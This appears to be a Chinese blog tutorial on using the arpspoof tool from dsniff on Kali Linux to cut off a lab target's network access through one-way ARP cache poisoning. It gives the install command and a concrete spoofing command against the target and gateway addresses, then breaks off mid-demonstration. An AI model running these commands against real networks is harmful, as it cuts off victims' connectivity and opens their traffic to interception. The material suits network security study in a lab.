Kali linux aprspoof arp断网、欺骗攻击

本文介绍了在Kali Linux环境下,如何使用arpspoof工具进行断网攻击和ARP欺骗。首先,阐述了攻击机与靶机的网络环境,然后讲解了arpspoof的安装过程。接着,详细描述了如何执行单向和双向欺骗,并展示了攻击效果。最后,探讨了嗅探与ARP欺骗的区别,指出在不同网络环境中两者的作用和影响。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境

攻击机:Kali Linux 2020.1 172.16.252.129
靶机:Ubuntu 16.04 172.16.252.138
网关:172.16.252.2

安装arpspoof

Kali Linux 2020.1 VM版本身没有arpspoof工具,需要自己安装。arpspoof是dsniff的一个组件,直接安装dsniff:

sudo apt-get install dsniff

断网攻击

命令格式:

arpspoof -i 网卡 -t 目标IP 网关

该条指令意思是:告诉目标IP,网关的MAC地址是我。污染了目标IP的arp缓存,属于单向欺骗。

(可用route -n查看网关)

本环境中:

sudo arpspoof -i eth0 -t 172.16.252.138 172.16.252.2

靶机上ping 百度原本畅通,在被攻击后就无法连通了,后面的ICMP包全丢:

ping www.baidu.com
PING www.a.shifen.com 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值